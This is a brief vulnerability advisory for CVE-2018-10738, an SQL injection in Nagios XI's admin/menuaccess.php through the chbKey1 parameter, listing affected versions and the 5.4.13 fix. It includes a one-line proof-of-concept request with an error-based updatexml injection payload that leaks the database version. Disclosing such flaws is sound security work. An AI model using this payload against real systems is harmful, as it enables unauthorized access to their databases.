NagiosXI <= 5.4.12 menuaccess.php... CVE-2018-10738 CNNVD-201805-491

6.5 AV AC AU C I A
发布: 2018-05-16
修订: 2018-06-15

### NagiosXI <= 5.4.12 menuaccess.php SQL injection(CVE-2018-10738) #### Description A SQL injection issue was discovered in Nagios XI via the admin/menuaccess.php chbKey1parameter. #### Affected Version * Nagios XI 5.2.x * Nagios XI 5.4.x before 5.4.13 #### Proof of concept ``` http://xxxx/nagiosql/admin/menuaccess.php chbKey1=' or updatexml(2,concat(0x7e,(version())),0) or''#&selSubMenu=1&subSave=1 ``` ![](https://images.seebug.org/1525859270765-w331s) #### Fix Upgrade to version 5.4.13

0%
暂无可用Exp或PoC
当前有2条受影响产品信息